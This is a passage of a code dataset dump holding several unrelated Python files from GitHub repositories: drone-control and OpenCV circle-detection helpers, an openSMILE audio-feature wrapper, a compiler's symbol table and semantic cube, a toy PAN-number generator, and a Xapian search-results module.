print('answer = 4, flip left')\n if i == 5:\n a1 = \"cw {}\".format(360) \n print('answer = 5, clockwise 360')\n return a1, a2\n\ndef circle(img, img_bin):\n img_c = np.copy(img)\n #img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n c = cv2.HoughCircles(img_bin, cv2.HOUGH_GRADIENT, 1, 20)\n #print(c)\n if type(c) == type(None):\n return img_c, c\n c = np.uint16(np.around(c))\n if c[0][0].ndim == 1:\n for i in c[0,:]:\n cv2.circle(img_c,(i[0],i[1]),i[2],(0,255,0),2)\n cv2.circle(img_c,(i[0],i[1]),2,(0,0,255),3)\n return img_c, c\n\ndef mission(num, drone):\n if num == 1:\n drone.move_up(30)\n drone.move_down(30)\n elif num == 2:\n drone.flip_forward()\n elif num == 3:\n drone.move_down(30)\n drone.move_up(30)\n elif num == 4:\n drone.flip_left()\n elif num == 5:\n drone.rotate_clockwise(360)\n else: return 'X'\n\ndef clr(img, pts, r):\n pix = np.uint8([[img[pts[1],pts[0]]]])\n hsv = cv2.cvtColor(pix, cv2.COLOR_BGR2HSV).squeeze()\n #print(hsv)\n h = hsv[0]\n #s = hsv[1]\n v = hsv[2]\n if v > 100: return 'X'\n if (h < r or h > 180-r): return 'R' #and s < 210+r and s > 210-r and v < 140+r and v > 140-r\n if h < 68+r and h > 68-r: return 'G' #and s < 138+r and s > 138-r and v < 90+r and v > 90-r\n if h < 108+r and h > 108-r: return 'B' #and s < 240+r and s > 240-r and v < 115+r and v > 115-r\n return 'X'\n\ndef circle_follow(cir, clr):\n if len(cir[clr]) == 0:\n return \"rc {} {} {} {}\".format(0,0,0,50)\n if cir[clr][0][2] > 60:\n print(cir[clr], clr, 'detected')\n if abs(cir[clr][0][0]-180)>15 or abs(cir[clr][0][1]-100)>30:\n return \"rc {} {} {} {}\".format((cir[clr][0][0]-180)/2.6,0,(100-cir[clr][0][1])/2,0)\n if cir[clr][0][2] < 70:#40:\n return \"rc {} {} {} {}\".format(0,(80-cir[clr][0][2])/1.5,0,0)\n return True\n'''\n","repo_name":"blu-y/eml","sub_path":"main_func.py","file_name":"main_func.py","file_ext":"py","file_size_in_byte":20413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35592259661","text":"#螺旋矩阵\nclass Solution:\n \"\"\"\n @param: : a matrix of m x n elements\n @return: an integer list\n \"\"\"\n\n def spiralOrder(self, matrix):\n # write your code here\n if matrix == []:\n return []\n m = len(matrix)\n n = len(matrix[0])\n I = []\n leg = 0\n reg = n - 1\n aeg = 0\n beg = m - 1\n while (leg < reg) and (aeg < beg):\n for i in range(leg, reg):\n I.append(matrix[aeg][i])\n for i in range(aeg, beg):\n I.append(matrix[i][reg])\n for i in range(reg, leg, -1):\n I.append(matrix[beg][i])\n for i in range(beg, aeg, -1):\n I.append(matrix[i][leg])\n leg = leg + 1\n reg = reg - 1\n aeg = aeg + 1\n beg = beg - 1\n if leg == reg:\n for i in range(aeg, beg + 1):\n I.append(matrix[i][leg])\n elif aeg == beg:\n for i in range(leg, reg + 1):\n I.append(matrix[aeg][i])\n return I\n ","repo_name":"huaiyizhao/Python-Scripts","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14929051560","text":"import os\nfrom global_vars import *\nimport tempfile\nimport numpy as np\nimport subprocess\n\nOPENSMILE_PATH = os.path.join(ROOT_FOLDER, \"opensmile-2.3.0//bin//Win32//SMILExtract_Release.exe\")\nCONFIG_PATH = os.path.join(ROOT_FOLDER, \"opensmile-2.3.0//config//emobase.conf\")\nWAV_FOLDER = os.path.join(ROOT_FOLDER, \"datasets//IEMOCAP//wavs_word_level\")\nOUTPUT_FOLDER = os.path.join(ROOT_FOLDER, \"datasets//IEMOCAP//features//audio//emobase_word_level\")\n\ncmdline_base = OPENSMILE_PATH + \" -configfile \" + CONFIG_PATH\n\ndef get_emobase_features(audio_file):\n \"\"\"\n Reads the emobase feature set out of the openSMILE tool and returns the featureset as float array\n (989 features per audio file)\n :param audio_file:\n :return:\n \"\"\"\n cmdline = cmdline_base + \" -inputfile \" + audio_file\n with tempfile.TemporaryDirectory() as temp_dir:\n temp_file = os.path.join(temp_dir, 'out.arff')\n cmdline += \" -arffout \" + temp_file\n with open(os.devnull, 'wb') as devnull:\n subprocess.call(cmdline, stdout=devnull, stderr=subprocess.STDOUT)\n\n with open(temp_file, \"rb\") as f:\n # only read last line (parts copied from https://stackoverflow.com/questions/3346430)\n f.seek(-2, os.SEEK_END)\n while f.read(1) != b\"\\n\":\n f.seek(-2, os.SEEK_CUR)\n last = str(f.readline())\n # remove everything before and after the last comma to only get the features\n if len(last.split(',')) <= 1:\n print('No features for ' + audio_file)\n return\n cleaned_last_line = last.split(',', 1)[1]\n cleaned_last_line = cleaned_last_line.rsplit(',', 1)[0]\n emobase_features = np.array(cleaned_last_line.split(',')).astype(np.float)\n return emobase_features","repo_name":"HenryvanderVegte/masters_thesis","sub_path":"preprocessing/openSMILE/openSMILE_wrapper.py","file_name":"openSMILE_wrapper.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"69983875299","text":"class Solution:\n def checkInclusion(self, s1: str, s2: str) -> bool:\n s1dict = {}\n for char in s1:\n s1dict[char] = 1 + s1dict.get(char,0)\n \n window = len(s1)\n for i in range(len(s2)-window+1):\n s2dict = {}\n for j in range(i,i+window):\n s2dict[s2[j]] = 1 + s2dict.get(s2[j],0)\n if s1dict == s2dict:\n return True\n return False\n ","repo_name":"bvedang/Data-Structure-and-Algorithms","sub_path":"0567-permutation-in-string/0567-permutation-in-string.py","file_name":"0567-permutation-in-string.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5448880893","text":"from parser.variable_address import VariablesAddress\nimport sys\n\n\nclass FunctionTable(object):\n '''\n Class to keep variable semantics.\n Created using a dictionary of dictionaries that stores the names of the functions as keys for O(1) search time\n and the rest of the values as a dictionary. e.j. {'funcName':{'name':'funcName','type':'int',...}}.\n Stores the latest added function name to add all the next variables to that scope.\n Variables are added to a new table added as a value to the function dictionary.\n '''\n\n def __init__(self) -> None:\n self.functionNameMap = {}\n self.constantTable = {'size': {}, 'vars': {}}\n self.currFunction = ''\n self.currFunctionScope = ''\n self.programName = ''\n self.currType = ''\n\n def addFunction(self, row: dict, type: str) -> None:\n '''\n Checks name of function does not exist, then adds it to the dictionary using it's name as key.\n Sets current function as this function.\n Raises syntaxerror if function already exists.\n '''\n if row['name'] not in self.functionNameMap:\n self.functionNameMap[row['name']] = row\n self.currFunction = row['name']\n self.currFunctionScope = type\n else:\n sys.exit(\"Error: function name already in use\")\n\n def addVariables(self, row: dict, name: str = None, size: int = 1) -> None:\n '''\n Function to add variables to current function.\n Uses last added function as default, but an extra optional parameter with the name of the function is accepted.\n Adds 1 to the function size in the table.\n '''\n if name and name in self.functionNameMap and row['name'] not in self.functionNameMap[name]['variables']:\n self.functionNameMap[name]['variables'][row['name']] = row\n elif row['name'] not in self.functionNameMap[self.currFunction]['variables']:\n self.functionNameMap[self.currFunction]['variables'][row['name']] = row\n else:\n sys.exit(\"Error: variable name '\" +\n row['name'] + \"' already in use\")\n\n self.addSize(row['type'], size)\n\n def addParameters(self, type: str) -> None:\n '''\n Function to add parameters types to current function table.\n '''\n self.functionNameMap[self.currFunction]['parameters'].append(type)\n\n def getParameter(self, function: str, idx: int) -> str:\n '''\n Function to get parameter type of given function and the index.\n '''\n paramCount = len(self.functionNameMap[function]['parameters'])\n if paramCount > idx:\n return self.functionNameMap[function]['parameters'][idx]\n else:\n sys.exit(\n f'Error: function {function} only takes {paramCount} arguments')\n\n def getParameterCount(self, function: str) -> str:\n '''\n Function to get parameter count of given function.\n '''\n return len(self.functionNameMap[function]['parameters'])\n\n def getFunction(self, name: str) -> dict:\n '''\n Function that returns the dictionary of the name of function given.\n Returns empty dict if name does not exist.\n '''\n if name in self.functionNameMap:\n return self.functionNameMap[name]\n return {}\n\n def addSize(self, type: str, size: int = 1) -> None:\n '''\n Adds size given or 1 to current function size.\n '''\n if type in self.functionNameMap[self.currFunction]['size']:\n self.functionNameMap[self.currFunction]['size'][type] += size\n else:\n self.functionNameMap[self.currFunction]['size'][type] = size\n\n def getFunctions(self) -> dict:\n '''\n Returns the whole dictionary of functions and variables.\n '''\n return self.functionNameMap\n\n def getConstants(self) -> dict:\n '''\n Returns the whole dictionary of constants.\n '''\n return self.constantTable\n\n def deleteFunction(self, name: str) -> bool:\n '''\n Deletes function given the name.\n Returns true if deleted, false otherwise.\n '''\n if name in self.functionNameMap:\n self.functionNameMap.pop(name)\n return True\n return False\n\n def deleteFunctionVariables(self, name: str) -> None:\n '''\n Deletes function given the name.\n Returns true if deleted, false otherwise.\n '''\n if name in self.functionNameMap:\n self.functionNameMap[name].pop('variables')\n else:\n sys.exit(f'Error: function {name} not declared')\n\n def functionExists(self, name: str) -> None:\n '''\n Raises syntax error if funciton does not exist.\n '''\n if name not in self.functionNameMap:\n sys.exit(f'Error: function {name} not declared')\n\n def setCurrentFunction(self, name: str, scope: str) -> None:\n '''\n Sets current function.\n '''\n self.currFunction = name\n self.currFunctionScope = scope\n\n def getCurrentFunction(self) -> str:\n '''\n Gets current function.\n '''\n return self.currFunction\n\n def getCurrentFunctionScope(self) -> str:\n '''\n Gets current function.\n '''\n return self.currFunctionScope\n\n def getCurrentType(self) -> str:\n '''\n Returns current type.\n '''\n return self.currType\n\n def setCurrentType(self, name: str) -> None:\n '''\n Sets current type.\n '''\n self.currType = name\n\n def setProgramName(self, name: str) -> None:\n '''\n Sets program name.\n '''\n self.programName = name\n\n def getProgramName(self) -> str:\n '''\n Gets program name.\n '''\n return self.programName\n\n def getFuncitonSize(self, name: str) -> dict:\n '''\n Gets function size.\n '''\n return self.functionNameMap[name]['size']\n\n def getVariable(self, name: str) -> dict:\n '''\n Checks if variable is declared and returns it's info, raises syntax error if not declared.\n '''\n if name in self.functionNameMap[self.currFunction]['variables']:\n return self.functionNameMap[self.currFunction]['variables'][name]\n elif name in self.functionNameMap[self.programName]['variables']:\n return self.functionNameMap[self.programName]['variables'][name]\n sys.exit(\n f'Error: variable {name} not declared in scope or global variables')\n\n def getGlobalVariable(self, name: str) -> dict:\n '''\n Returns the given function global variable.\n '''\n if name in self.functionNameMap[self.programName]['variables']:\n return self.functionNameMap[self.programName]['variables'][name]\n sys.exit(\n f'Error: variable {name} not declared in scope or global variables')\n\n def getFunctionReturnType(self, name: str) -> dict:\n '''\n Returns given function return type.\n '''\n return self.functionNameMap[name]['returnType']\n\n def deleteTable(self) -> None:\n '''\n Deletes table.\n '''\n del self.functionNameMap\n\n def isConstant(self, cons: any) -> bool:\n '''\n Check if constant exists in the table.\n '''\n return cons in self.constantTable['vars']\n\n def addConstant(self, cons: any, address: int, type: str) -> None:\n '''\n Adds constant to table.\n '''\n self.constantTable['vars'][cons] = (address, type)\n if type in self.constantTable['size']:\n self.constantTable['size'][type] += 1\n else:\n self.constantTable['size'][type] = 1\n\n def getConstant(self, cons: any) -> int:\n '''\n Returns constant address.\n '''\n return self.constantTable['vars'][cons][0]\n\n def getFunctionStartingAddress(self, function: str) -> int:\n '''\n Returns function starting address.\n '''\n if function in self.functionNameMap:\n return self.functionNameMap[function]['address']\n else:\n sys.exit(\n f'ERROR: function {function} was not found')\n\n def verifyReturnType(self, type: str) -> None:\n '''\n Verifies the return type is the same as the one expected in the function, sets has return flag as true\n '''\n functionReturnType = self.functionNameMap[self.currFunction]['returnType']\n if functionReturnType != type:\n sys.exit(\n f'ERROR: return type {type} does not match function return type {functionReturnType}')\n else:\n self.functionNameMap[self.currFunction]['hasReturn'] = True\n\n def verifyHasReturn(self) -> None:\n '''\n Verifies the function if not void, had a return statement\n '''\n if not self.functionNameMap[self.currFunction]['hasReturn'] and self.functionNameMap[self.currFunction]['returnType'] != 'void':\n sys.exit(\n f'ERROR: function {self.currFunction} has no return statement')\n\n def setFunctionMap(self, map: dict) -> None:\n '''\n Function to set the function map from one previously created.\n '''\n self.functionNameMap = map\n\n def setConstantTable(self, map: dict) -> None:\n '''\n Function to set the constant table from one previously created.\n '''\n self.constantTable = map\n\n\nclass SemanticCube(object):\n '''\n Class to keep semantic cube and access it.\n It utilizes a dictornay of dictionaries to access the result in constant O(1) time.\n '''\n\n def __init__(self) -> None:\n self.cube = {\n \"int\": {\n \"int\": {\n \"+\": \"int\",\n \"/\": \"int\",\n \"<\": \"bool\",\n \"=\": \"int\",\n \"&\": \"bool\",\n },\n \"float\": {\n \"+\": \"float\",\n \"/\": \"float\",\n \"<\": \"bool\",\n \"=\": \"int\",\n },\n \"char\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n \"bool\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n \"&\": \"bool\",\n },\n\n },\n \"float\": {\n \"int\": {\n \"+\": \"float\",\n \"/\": \"float\",\n \"<\": \"bool\",\n \"=\": \"float\",\n },\n \"float\": {\n \"+\": \"float\",\n \"/\": \"float\",\n \"<\": \"bool\",\n \"=\": \"float\",\n },\n \"char\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n \"bool\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n\n },\n \"char\": {\n \"int\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n \"float\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n \"char\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"char\",\n },\n \"bool\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n\n },\n \"bool\": {\n \"int\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"bool\",\n \"&\": \"bool\",\n },\n \"float\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"bool\",\n },\n \"char\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n \"bool\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"bool\",\n \"&\": \"bool\",\n },\n\n },\n }\n\n def getResult(self, leftOp: str, rightOp: str, symb: str) -> str:\n '''\n Function that given the left, right operator and the symbol returns the semantic result.\n If result is error, a syntax error will be raised.\n '''\n if symb == '-' or symb == '+':\n symb = '+'\n elif symb == '*' or symb == '/':\n symb = '/'\n elif symb == '<' or symb == '>' or symb == '>=' or symb == '<=' or symb == '==' or symb == '!=':\n symb = '<'\n elif symb == '&' or symb == '|':\n symb = '&'\n\n if leftOp in self.cube:\n if rightOp in self.cube[leftOp]:\n if symb in self.cube[leftOp][rightOp]:\n ans = self.cube[leftOp][rightOp][symb]\n\n if ans != 'err':\n return ans\n\n sys.exit(f'Error: semantic not recognized {leftOp} {symb} {rightOp}')\n","repo_name":"adriangzz/mina","sub_path":"parser/variable_semantics.py","file_name":"variable_semantics.py","file_ext":"py","file_size_in_byte":13748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3526757439","text":"\"Generating PAN Number.\"\n\n'''\nStructure of PAN number:\n\nThe PAN (or PAN number) is a ten-character long alpha-numeric unique identifier.\n\nThe PAN structure is as follows: Fourth character [P — Individual or Person ] Example: AAAPZ1234C\n\n# The first five characters are letters (in uppercase by default), followed by four numerals, and the last (tenth) character is a letter.\n# The first three characters of the code are three letters forming a sequence of alphabets letters from AAA to ZZZ\n# The fourth character identifies the type of holder of the card. Each holder type is uniquely defined by a letter from the list below:\n A — Association of persons (AOP)\n B — Body of individuals (BOI)\n C — Company\n F — Firm\n G — Government\n H — HUF (Hindu undivided family)\n L — Local authority\n J — Artificial juridical person\n P — Individual or Person\n T — Trust (AOP)\n# The fifth character of the PAN is the first character of either:\n 1.of the surname or last name of the person, in the case of a \"personal\" PAN card, where the fourth character is \"P\" or\n 2.of the name of the entity, trust, society, or organisation in the case of a company/HUF/firm/AOP/trust/BOI/local authority/artificial judicial person/government, where the fourth character is \"C\", \"H\", \"F\", \"A\", \"T\", \"B\", \"L\", \"J\", \"G\".\n# The last (tenth) character is an alphabetic digit used as a check-sum to verify the validity of that current code\n ''' \n\nimport random \nalphabet = {\n '1':'A' , '2':'B' , '3':'C' , '4':'D' ,\n '5':'E' , '6':'F' , '7':'G' , '8':'H' ,\n '9':'I' , '10':'J', '11':'K' , '12':'L',\n '13':'M', '14':'N', '15':'O' , '16':'P',\n '17':'Q', '18':'R', '19':'S' , '20':'T', '21':'U',\n '22':'V', '23':'W', '24':'X' , '25':'Y', '26':'Z'\n }\ntype_of_card = {\n 'COMPANY':'C',\n 'FIRM':'F',\n 'GOVERNMENT':'G',\n 'HUF':'H',\n 'LOCALAUTHORITY':'L',\n 'PERSONAL':'P',\n 'TRUST':'T' \n } \ndef main(): \n print(\" Welcome \")\n Type = input(\"Please enter the type of card :\")\n Normalized_Type = normalize_name(Type)\n if Normalized_Type == 'PERSONAL':\n first_name = input(\"Please enter your first name : \")\n last_name = input(\"Please enter your last name : \")\n age = int(input(\"Please enter your age : \"))\n # If your age is not 18 , you can't have pan card.\n if age < 18 :\n print(\"You are not eligible for PAN card \")\n else : \n pan = get_pan_number(last_name,Normalized_Type)\n print(\"Your PAN card number is : \",pan)\n data = {}\n data['Name']= first_name + \" \" + last_name\n data['Age'] = age\n data['PAN Number'] = pan\n print ('Your PAN card detaiils : ',data)\n else : \n others = input(\"Please enter name : \")\n pan_others = get_pan_number(others,Normalized_Type)\n print ('PAN card number is : ',pan_others)\n pan_2 = {}\n pan_2['Name'] = others\n pan_2['PAN Number'] = pan_others\n print ('PAN card details : ',pan_2)\n\n\ndef normalize_name(s):\n '''\n This function takes a string of alphabets and returns upper case alphabets excluding other charecters between alphabets.\n >>> normalize_name('jodhpur park boys school')\n 'JODHPURPARKBOYSSCHOOL'\n '''\n normalized = ''\n for ch in s:\n if ch.isalpha():\n normalized += ch.upper()\n return normalized\n\n\ndef pad(num, length):\n '''\n >>> pad(457,4)\n 0457\n '''\n num_string = str(num)\n while len(num_string) < length:\n # insert a 0 at the start of the string, increasing its length by one\n num_string = \"0\" + num_string\n return num_string\n\n\ndef get_pan_number(name,Type):\n norm = normalize_name(name)\n First = alphabet[str(random.randint(1,26))]\n second = alphabet[str(random.randint(1,26))]\n third = alphabet[str(random.randint(1,26))]\n fourth = type_of_card[Type]\n fifth = norm[0]\n number = pad(random.randint(0,9999),4)\n sixth = norm[random.randint(0,len(norm)-1)]\n pan_id = (First + second + third + fourth + fifth + number + sixth)\n \n return pan_id\n\nif __name__ == '__main__':\n main()\n","repo_name":"nemo138/myproject","sub_path":"project2 (1).py","file_name":"project2 (1).py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27362218066","text":"r\"\"\"mset_search_results.py: The results of a search performed against xapian.\n\n\"\"\"\n__docformat__ = \"restructuredtext en\"\n\nimport _checkxapian\n\nimport errors\nfrom fieldactions import FieldActions\nfrom indexerconnection import IndexerConnection\nimport math\nimport re\nfrom searchresults import SearchResult\nimport xapian\n\nclass MSetTermWeightGetter(object):\n \"\"\"Object for getting termweights directly from an mset.\n\n \"\"\"\n def __init__(self, mset):\n self.mset = mset\n\n def get(self, term):\n return self.mset.get_termweight(term)\n\n\nclass MSetSearchResultIter(object):\n \"\"\"An iterator over a set of results from a search.\n\n \"\"\"\n def __init__(self, mset, context):\n self.context = context\n self.it = iter(mset)\n\n def next(self):\n return SearchResult(self.it.next(), self.context)\n\n\nclass MSetResultOrdering(object):\n def __init__(self, mset, context, connection):\n self.mset = mset\n self.context = context\n self._conn = connection\n\n def get_iter(self):\n \"\"\"Get an iterator over the search results.\n\n \"\"\"\n return MSetSearchResultIter(self.mset, self.context)\n\n def get_hit(self, index):\n \"\"\"Get the hit with a given index.\n\n \"\"\"\n msetitem = self.mset.get_hit(index)\n return SearchResult(msetitem, self.context)\n\n def get_startrank(self):\n return self.mset.get_firstitem()\n\n def get_endrank(self):\n return self.mset.get_firstitem() + len(self.mset)\n\n def __len__(self):\n \"\"\"Get the number of items in this ordering.\n\n \"\"\"\n return len(self.mset)\n\n def _cluster(self, num_clusters, maxdocs, fields, assume_single_value):\n \"\"\"Cluster results based on similarity.\n\n Note: this method is experimental, and will probably disappear or\n change in the future.\n\n The number of clusters is specified by num_clusters: unless there are\n too few results, there will be exaclty this number of clusters in the\n result.\n\n \"\"\"\n clusterer = xapian.ClusterSingleLink()\n xapclusters = xapian.ClusterAssignments()\n docsim = xapian.DocSimCosine()\n source = xapian.MSetDocumentSource(self.mset, maxdocs)\n\n if fields is None:\n try:\n # backwards compatibility; used to have to supply the index as\n # first param, and didn't have the slotnum option.\n clusterer.cluster(xapclusters, docsim, source, num_clusters)\n except TypeError:\n clusterer.cluster(self._conn._index, xapclusters, docsim, source, num_clusters)\n else:\n # If there's only one field and it has unique instances stored in a\n # value, use the value instead of the termlist.\n slotnum = self._get_singlefield_slot(fields, assume_single_value)\n try:\n if slotnum is not None:\n decider = None\n clusterer.cluster(xapclusters, docsim, source, slotnum, num_clusters)\n else:\n decider = self._make_expand_decider(fields)\n clusterer.cluster(xapclusters, docsim, source, decider, num_clusters)\n except TypeError:\n # backwards compatibility; used to have to supply the index as\n # first param, and didn't have the slotnum option.\n if decider is None:\n decider = self._make_expand_decider(fields)\n clusterer.cluster(self._conn._index,\n xapclusters, docsim, source, decider, num_clusters)\n\n newid = 0\n idmap = {}\n clusters = {}\n for item in self.mset:\n docid = item.docid\n clusterid = xapclusters.cluster(docid)\n if clusterid not in idmap:\n idmap[clusterid] = newid\n newid += 1\n clusterid = idmap[clusterid]\n if clusterid not in clusters:\n clusters[clusterid] = []\n clusters[clusterid].append(item.rank)\n return clusters\n\n def _reorder_by_collapse(self, highest_possible_percentage):\n \"\"\"Reorder the result by the values in the slot used to collapse on.\n\n `highest_possible_percentage` is a tuning variable - we need to get an\n estimate of the probability that a particular hit satisfies the query.\n We use the relevance score for this estimate, but this requires us to\n pick a value for the top hit. This variable specifies that percentage.\n\n \"\"\"\n\n if self.mset.get_firstitem() != 0:\n raise errors.SearchError(\"startrank must be zero to reorder by collapse\")\n if not hasattr(self, \"collapse_max\"):\n raise errors.SearchError(\"A collapse must have been performed on the search in order to use _reorder_by_collapse\")\n\n if self.collapse_max == 1:\n # No reordering to do - we're already fully diverse according to\n # the values in the slot.\n return\n\n if self.mset.get_firstitem() + len(self.mset) <= 1:\n # No reordering to do - 0 or 1 items.\n return\n\n topweight = self.mset.get_hit(0).weight\n toppct = self.mset.get_hit(0).percent\n if topweight == 0 or toppct == 0:\n # No weights, so no reordering to do.\n # FIXME - perhaps we should pick items from each bin in turn until\n # the bins run out? Not sure this is useful in any real situation,\n # though.\n return\n\n maxweight = topweight * 100.0 * 100.0 / highest_possible_percentage / float(toppct)\n\n # utility of each category; initially, this is the probability that the\n # category is relevant.\n utilities = {}\n pqc_sum = 0.0\n\n # key is the collapse key, value is a list of (rank, weight) tuples,\n # in that collapse bin.\n collapse_bins = {}\n\n # Fill collapse_bins.\n for i in xrange(self.mset.get_firstitem() + len(self.mset)):\n hit = self.mset.get_hit(i)\n category = hit.collapse_key\n try:\n l = collapse_bins[category]\n except KeyError:\n l = []\n collapse_bins[category] = l\n if i < 100:\n utilities[category] = hit.weight\n pqc_sum += hit.weight\n l.append((i, hit.weight / maxweight))\n\n pqc_sum /= 0.99 # Leave 1% probability for other categories\n\n # Nomalise the probabilities for each query category, so they add up to\n # 1.\n utilities = dict((k, v / pqc_sum)\n for (k, v)\n in utilities.iteritems())\n\n # Calculate scores for the potential next hits. These are the top\n # weighted hits in each category.\n potentials = {}\n for category, l in collapse_bins.iteritems():\n wt = l[0][1] # weight of the top item\n score = wt * utilities.get(category, 0.01) # current utility of the category\n potentials[category] = (l[0][0], score, wt)\n\n new_order = []\n while len(collapse_bins) != 0:\n # The potential next hits are the ones at the top of each\n # collapse_bin.\n\n # Pick the next category to use, by finding the maximum score\n # (breaking ties by choosing the highest ranked one in the original\n # order).\n next_cat, (next_i, next_score, next_wt) = max(potentials.iteritems(), key=lambda x: (x[1][1], -x[1][0]))\n\n # Update the utility of the chosen category\n utilities[next_cat] = (1.0 - next_wt) * utilities.get(next_cat, 0.01)\n \n # Move the newly picked item from collapse_bins to new_order\n new_order.append(next_i)\n l = collapse_bins[next_cat]\n if len(l) <= 1:\n del collapse_bins[next_cat]\n del potentials[next_cat]\n else:\n collapse_bins[next_cat] = l[1:]\n wt = l[1][1] # weight of the top item\n potentials[next_cat] = (l[1][0],\n wt * utilities.get(next_cat, 0.01), wt)\n\n return ReorderedMSetResultOrdering(self.mset, new_order, self.context)\n\n def _reorder_by_clusters(self, clusters):\n \"\"\"Reorder the mset based on some clusters.\n\n \"\"\"\n if self.mset.get_firstitem() != 0:\n raise errors.SearchError(\"startrank must be zero to reorder by clusters\")\n tophits = []\n nottophits = []\n\n clusterstarts = dict(((c[0], None) for c in clusters.itervalues()))\n for i in xrange(self.mset.get_firstitem() + len(self.mset)):\n if i in clusterstarts:\n tophits.append(i)\n else:\n nottophits.append(i)\n new_order = tophits\n new_order.extend(nottophits)\n return ReorderedMSetResultOrdering(self.mset, new_order, self.context)\n\n def _get_singlefield_slot(self, fields, assume_single_value):\n \"\"\"Return the slot number if the specified list of fields contains only\n one entry, and that entry is single-valued for each document, and\n stored in a value slot.\n\n Return None otherwise.\n\n \"\"\"\n prefixes = {}\n if isinstance(fields, basestring):\n fields = [fields]\n if len(fields) != 1:\n return None\n\n field = fields[0]\n try:\n actions = self._conn._field_actions[field]._actions\n except KeyError:\n return None\n\n for action, kwargslist in actions.iteritems():\n if action == FieldActions.SORTABLE:\n return self._conn._field_mappings.get_slot(field, 'collsort')\n if action == FieldActions.WEIGHT:\n return self._conn._field_mappings.get_slot(field, 'weight')\n if assume_single_value:\n if action == FieldActions.FACET:\n return self._conn._field_mappings.get_slot(field, 'facet')\n\n def _make_expand_decider(self, fields):\n \"\"\"Make an expand decider which accepts only terms in the specified\n field.\n\n \"\"\"\n prefixes = {}\n if isinstance(fields, basestring):\n fields = [fields]\n for field in fields:\n try:\n actions = self._conn._field_actions[field]._actions\n except KeyError:\n continue\n for action, kwargslist in actions.iteritems():\n if action == FieldActions.INDEX_FREETEXT:\n prefix = self._conn._field_mappings.get_prefix(field)\n prefixes[prefix] = None\n prefixes['Z' + prefix] = None\n if action in (FieldActions.INDEX_EXACT,\n FieldActions.FACET,):\n prefix = self._conn._field_mappings.get_prefix(field)\n prefixes[prefix] = None\n prefix_re = re.compile('|'.join([re.escape(x) + '[^A-Z]' for x in prefixes.keys()]))\n class decider(xapian.ExpandDecider):\n def __call__(self, term):\n return prefix_re.match(term) is not None\n return decider()\n\n def _reorder_by_similarity(self, count, maxcount, max_similarity,\n fields):\n \"\"\"Reorder results based on similarity.\n\n The top `count` documents will be chosen such that they are relatively\n dissimilar. `maxcount` documents will be considered for moving around,\n and `max_similarity` is a value between 0 and 1 indicating the maximum\n similarity to the previous document before a document is moved down the\n result set.\n\n Note: this method is experimental, and will probably disappear or\n change in the future.\n\n \"\"\"\n if self.mset.get_firstitem() != 0:\n raise errors.SearchError(\"startrank must be zero to reorder by similiarity\")\n ds = xapian.DocSimCosine()\n ds.set_termfreqsource(xapian.DatabaseTermFreqSource(self._conn._index))\n\n if fields is not None:\n ds.set_expand_decider(self._make_expand_decider(fields))\n\n tophits = []\n nottophits = []\n full = False\n reordered = False\n\n sim_count = 0\n new_order = []\n end = min(self.mset.get_firstitem() + len(self.mset), maxcount)\n for i in xrange(end):\n if full:\n new_order.append(i)\n continue\n hit = self.mset.get_hit(i)\n if len(tophits) == 0:\n tophits.append(hit)\n continue\n\n # Compare each incoming hit to tophits\n maxsim = 0.0\n for tophit in tophits[-1:]:\n sim_count += 1\n sim = ds.similarity(hit.document, tophit.document)\n if sim > maxsim:\n maxsim = sim\n\n # If it's not similar to an existing hit, add to tophits.\n if maxsim < max_similarity:\n tophits.append(hit)\n else:\n nottophits.append(hit)\n reordered = True\n\n # If we're full of hits, append to the end.\n if len(tophits) >= count:\n for hit in tophits:\n new_order.append(hit.rank)\n for hit in nottophits:\n new_order.append(hit.rank)\n full = True\n if not full:\n for hit in tophits:\n new_order.append(hit.rank)\n for hit in nottophits:\n new_order.append(hit.rank)\n if end != self.mset.get_firstitem() + len(self.mset):\n new_order.extend(range(end,\n self.mset.get_firstitem() + len(self.mset)))\n assert len(new_order) == self.mset.get_firstitem() + len(self.mset)\n if reordered:\n return ReorderedMSetResultOrdering(self.mset, new_order,\n self.context)\n else:\n assert new_order == range(self.mset.get_firstitem() +\n len(self.mset))\n return self\n\n\nclass ResultStats(object):\n def __init__(self, mset, cache_stats):\n self.mset = mset\n self.cache_stats = list(cache_stats)\n\n def get_lower_bound(self):\n if self.cache_stats[0] is None:\n self.cache_stats[0] = self.mset.get_matches_lower_bound()\n return self.cache_stats[0]\n\n def get_upper_bound(self):\n if self.cache_stats[1] is None:\n self.cache_stats[1] = self.mset.get_matches_upper_bound()\n return self.cache_stats[1]\n\n def 